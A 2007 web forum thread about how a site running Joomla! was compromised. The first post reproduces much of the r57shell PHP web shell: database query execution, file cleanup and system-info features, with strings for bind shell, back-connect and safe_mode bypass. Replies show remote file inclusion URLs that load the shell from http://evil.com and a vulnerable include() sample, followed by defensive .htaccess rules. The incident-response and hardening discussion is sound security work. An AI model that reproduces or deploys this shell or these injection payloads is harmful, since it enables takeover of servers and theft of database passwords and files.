Jump to content




Recent Status Updates

  • Photo
      18 Aug
    KodeKool

    When faced with a wall of errors and no hope to fix them, remember the following "Programs always do what you tell them to, and seldom what you want them to, but eventually you'll run out of things that can go wrong and it'll just work. and that's the secret to good programming."

    Show comments (2)
  • Photo
      11 Aug
    Error

    Should I be practicing programming every day? I feel if I don't, I'll get instantly rusty or something.

    Show comments (4)
View All Updates

Developed by Kemal Taskin
- - - - -

Joomla! Hacking Script

runtime

  • This topic is locked This topic is locked
107 replies to this topic

#1 Guest_Jordan_*

Guest_Jordan_*
  • Guest

Posted 23 October 2007 - 05:54 AM

After CodeCall had been hacked several times I sought more intensely how to beat these script kiddies. I thought that I had secured everything and prevent any further attacks but I found that I was wrong.

Below is the script used to gain access to CodeCall


<?php
/******************************************************************************************************/
/* ## ##
/* ## ##
/* #######
/* ## ##
/* ## ##
/*
/*
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер
/* Версия: 1.23
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/******************************************************************************************************/

/* ~~~ Настройки ~~~ */
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.23";
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_SERVER as $k=>$v)
{
$_SERVER[$k] = stripslashes($v);
}
}

/* ~~~ Аутентификация ~~~ */

// $auth = 1; - Аутентификация включена
// $auth = 0; - Аутентификация выключена
$auth = 0;

// Логин и пароль для доступа к скрипту
// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!!
$name='hackhell'; // логин пользователя
$pass='biribizidurdursun'; // пароль пользователя

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
{
header('WWW-Authenticate: Basic realm="shell"');
header('HTTP/1.0 401 Unauthorized');
exit("<b><a href=http://www.hackhell.com>www.hackhell.com</a> : Access Denied</b>");
}
}
$head = '<!-- Здравствуй Вася -->
<html>
<head>
<title>shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
.table1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
BACKGROUND-COLOR: #D4D0C8;
}
.td1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
font: 7pt Verdana;
}
.tr1 {
BORDER-RIGHT: #cccccc 0px;
BORDER-TOP: #cccccc 0px;
BORDER-LEFT: #cccccc 0px;
BORDER-BOTTOM: #cccccc 0px;
}
table {
BORDER-RIGHT: #eeeeee 1px outset;
BORDER-TOP: #eeeeee 1px outset;
BORDER-LEFT: #eeeeee 1px outset;
BORDER-BOTTOM: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>';
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
if ($_POST['cmd']=="db_query")
{
echo $head;
switch($_POST['db'])
{
case 'MySQL':
if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
$db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
if($db)
{
if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); }
$querys = @explode(';',$_POST['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
$res = @mysql_query($query,$db);
$error = @mysql_error($db);
if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@mysql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @mysql_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
}
@mysql_free_result($res);
}
}
@mysql_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>";
break;
case 'MSSQL':
if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
$db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
if($db)
{
if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
$querys = @explode(';',$_POST['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
$res = @mssql_query($query,$db);
if (@mssql_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @mssql_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
/* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */
@mssql_free_result($res);
}
}
@mssql_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>";
break;
case 'PostgreSQL':
if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
$str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
$db = @pg_connect($str);
if($db)
{
$querys = @explode(';',$_POST['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5){
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
$res = @pg_query($db,$query);
$error = @pg_errormessage($db);
if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }
else {
if (@pg_num_rows($res) > 0)
{
$sql2 = $sql = $keys = $values = '';
while (($row = @pg_fetch_assoc($res)))
{
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);}
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$values);
$sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>";
}
echo "<table width=100%>";
$sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
$sql .= $sql2;
echo $sql;
echo "</table><br>";
}
else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } }
}
@pg_free_result($res);
}
}
@pg_close($db);
}
else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>";
break;
case 'Oracle':
$db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']);
if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; }
else
{
$querys = @explode(';',$_POST['db_query']);
foreach($querys as $num=>$query)
{
if(strlen($query)>5) {
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>";
$stat = @ociparse($db, $query);
@ociexecute($stat);
if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; }
else
{
$rowcount = @ocirowcount($stat);
if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";}
else {
echo "<table width=100%><tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b> ".htmlspecialchars(@ocicolumnname($stat, $j))." </b></font></td>"; }
echo "</tr>";
while(ocifetch($stat))
{
echo "<tr>";
for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2> ".htmlspecialchars(@ociresult($stat, $j))." </font></td>"; }
echo "</tr>";
}
echo "</table><br>";
}
@ocifreestatement($stat);
}
}
}
@ocilogoff($db);
}
break;
}
echo "<form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['delete']))
{
@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
}
if(isset($_GET['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['cpu']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['mem']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
/*
Выбор языка
$language='eng' - русский
$language='ru' - английский
*/
$language='eng';
$lang=array(
'ru_text1' =>'Выполненная команда',
'ru_text2' =>'Выполнение команд на сервере',
'ru_text3' =>'Выполнить команду',
'ru_text4' =>'Рабочая директория',
'ru_text5' =>'Загрузка файлов на сервер',
'ru_text6' =>'Локальный файл',
'ru_text7' =>'Алиасы',
'ru_text8' =>'Выберите алиас',
'ru_butt1' =>'Выполнить',
'ru_butt2' =>'Загрузить',
'ru_text9' =>'Открытие порта и привязка его к /bin/bash',
'ru_text10'=>'Открыть порт',
'ru_text11'=>'Пароль для доступа',
'ru_butt3' =>'Открыть',
'ru_text12'=>'back-connect',
'ru_text13'=>'IP-адрес',
'ru_text14'=>'Порт',
'ru_butt4' =>'Выполнить',
'ru_text15'=>'Загрузка файлов с удаленного сервера',
'ru_text16'=>'Использовать',
'ru_text17'=>'Удаленный файл',
'ru_text18'=>'Локальный файл',
'ru_text19'=>'Exploits',
'ru_text20'=>'Использовать',
'ru_text21'=>'Новое имя',
'ru_text22'=>'datapipe',
'ru_text23'=>'Локальный порт',
'ru_text24'=>'Удаленный хост',
'ru_text25'=>'Удаленный порт',
'ru_text26'=>'Использовать',
'ru_butt5' =>'Запустить',
'ru_text28'=>'Работа в safe_mode',
'ru_text29'=>'Доступ запрещен',
'ru_butt6' =>'Сменить',
'ru_text30'=>'Просмотр файла',
'ru_butt7' =>'Вывести',
'ru_text31'=>'Файл не найден',
'ru_text32'=>'Выполнение PHP кода',
'ru_text33'=>'Проверка возможности обхода ограничений open_basedir через функции cURL',
'ru_butt8' =>'Проверить',
'ru_text34'=>'Проверка возможности обхода ограничений safe_mode через функцию include',
'ru_text35'=>'Проверка возможности обхода ограничений safe_mode через загрузку файла в mysql',
'ru_text36'=>'База',
'ru_text37'=>'Логин',
'ru_text38'=>'Пароль',
'ru_text39'=>'Таблица',
'ru_text40'=>'Дамп таблицы базы данных',
'ru_butt9' =>'Дамп',
'ru_text41'=>'Сохранить в файле',
'ru_text42'=>'Редактирование файла',
'ru_text43'=>'Редактировать файл',
'ru_butt10'=>'Сохранить',
'ru_butt11'=>'Редактировать',
'ru_text44'=>'Редактирование файла невозможно! Доступ только для чтения!',
'ru_text45'=>'Файл сохранен',
'ru_text46'=>'Просмотр phpinfo()',
'ru_text47'=>'Просмотр настроек php.ini',
'ru_text48'=>'Удаление временных файлов',
'ru_text49'=>'Удаление скрипта с сервера',
'ru_text50'=>'Информация о процессоре',
'ru_text51'=>'Информация о памяти',
'ru_text52'=>'Текст для поиска',
'ru_text53'=>'Искать в папке',
'ru_text54'=>'Поиск текста в файлах',
'ru_butt12'=>'Найти',
'ru_text55'=>'Только в файлах',
'ru_text56'=>'Ничего не найдено',
'ru_text57'=>'Создать/Удалить Файл/Директорию',
'ru_text58'=>'Имя',
'ru_text59'=>'Файл',
'ru_text60'=>'Директорию',
'ru_butt13'=>'Создать/Удалить',

// See attached script for complete version!

?>
How this script works
Using injection it gives the abuser full access to all of your files in a semi-shell environment. The user has the ability to execute any commands such as 'ls', 'vi', or even 'rm'. This means they can read all of your configuration files which contain all of your SQL passwords.

The call function replaces mosConfig_absolute_path in your Joomla! configuration.

Example Call
http://www.codecall....te.com/c57.txt?

Results
See attachment

Solution
The easiest solution is to turn on the SEO feature of Joomla! in your Global Configuration of the Administration Panel. Don't forget to rename htaccess.txt to .htaccess. This will cause a call like above to error 403 Forbidden.

Attached Images

  • joomla_hack.gif

  • 0

#2 John

John

    CC Mentor

  • Moderator
  • 4,450 posts
  • Location:New York, NY

Posted 23 October 2007 - 09:08 AM

Very nice
  • 0

#3 TcM

TcM

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 7,563 posts

Posted 27 October 2007 - 01:39 AM

Haha OWNED! I wonder how you found that script!! And as far as I can see it only works with local files (ie where the script is hosted) so still.. how do they upload it to your server?
  • 0

#4 nullbyte

nullbyte

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 199 posts

Posted 28 October 2007 - 07:01 AM

Is that r57?

@TheComputerMaster
It doesn't have to be uploaded. Is called RFI (remote file inclusion), like:
www.url.com/index.php?page=http://evil.com/r57.php?
  • 0

#5 TcM

TcM

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 7,563 posts

Posted 28 October 2007 - 01:38 PM

I still can't understand... I mean how did he use the RFI on that script?! Where did he enter that?
  • 0

#6 nullbyte

nullbyte

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 199 posts

Posted 28 October 2007 - 11:35 PM

Well, look at the following PHP Script:
<?php
if(isset($_REQUEST['doc']))
{
$doc = $_REQUEST['doc'];
//Anti RFI-protection
$doc = str_replace('http://','',$doc);
include($doc);
}
?>


The URL would be for example:
http://example.com/index.php?doc=location_of_true_document.html
Well, that script is vulnerable, so, we can replace location_of_true_document.html with our address to the c99/r57 shell.
http://example.com/index.php?doc=http://evil.com/r57.php?

PHP on the victim's site will run our remotely accesed script :)

Hope you understand now.
  • 0

#7 TcM

TcM

    CC Mentor

  • VIP Member
  • PipPipPipPipPipPipPipPip
  • 7,563 posts

Posted 29 October 2007 - 06:31 AM

So we take the vulnerable url, for example www.joomlaisvunerable.com/index.php?My_url_where_the_script_is_hosted.php

If this is right then I understood.

Thanks! It's just using the $_GET command.
  • 0

#8 GMailGuy

GMailGuy

    CC Resident

  • Just Joined
  • PipPipPipPip
  • 59 posts

Posted 01 November 2007 - 03:23 PM

So turning on the Joomla's SEO feature on will disable the $_GET command.. or why does it stop it from being vulnerable?
  • 0

#9 Guest_Kaabi_*

Guest_Kaabi_*
  • Guest

Posted 01 November 2007 - 03:53 PM

While I understood very little of that code, I still appreciate it's complexity. And nice work for finding it!
  • 0

#10 Guest_Jordan_*

Guest_Jordan_*
  • Guest

Posted 02 November 2007 - 03:34 AM

Actually, it isn't the SEO component in Joomla! that blocks it and you could easily block this with an .htaccess file (which is what happens). When you enable the SEO component you have to enable their default .htaccess file by renaming htaccess.txt to .htaccess.

Anyway, inside of this .htaccess file is something that blocks the mosConfig from being set:

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

Along with that there are several other security blocks:

# Block out any script trying to base64_encode ** to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]

You could leave the SEO component disabled but I do recommend you put all of these values in a .htaccess on your Joomla! ran site.
  • 0

#11 kresh7

kresh7

    CC Addict

  • Just Joined
  • PipPipPipPipPip
  • 326 posts

Posted 05 November 2007 - 08:04 AM

nice tutorial
  • 0

#12 nonna

nonna

    CC Lurker

  • Just Joined
  • Pip
  • 1 posts

Posted 29 February 2008 - 11:27 AM

thanks :)
  • 0





Also tagged with one or more of these keywords: runtime